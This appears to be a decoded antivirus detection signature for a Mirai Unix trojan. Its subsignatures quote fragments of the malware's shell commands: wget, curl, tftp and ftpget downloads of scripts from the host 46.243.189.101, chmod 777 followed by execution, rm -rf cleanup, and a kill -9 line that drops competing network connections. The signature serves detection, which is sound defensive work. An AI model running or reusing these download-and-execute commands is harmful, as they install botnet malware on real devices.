VIRUS NAME: Unix.Trojan.Mirai-10002311-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
%s iptables -A INPUT -p %s --destination-port %s -j %s
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
7 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.243.189.101 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf t.sh 
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp/; wget http://46.243.189.101/t.sh; /bin/busybox wget http://46.243.189.101/t.sh; curl -O http://46.243.189.101/t.sh; chm
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
kill -9 `netstat -p -t | grep "ESTABLISHED" | grep -v "ESTABLISHED -" | grep -v "46.243.189.101" | grep -v ":5555" | gre
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
od 777 t.sh; sh t.sh; tftp 46.243.189.101 -c get tt.sh; chmod 777 tt.sh; sh tt.sh; tftp -r t8UsA2.sh -g 46.243.189.101; chmod 77
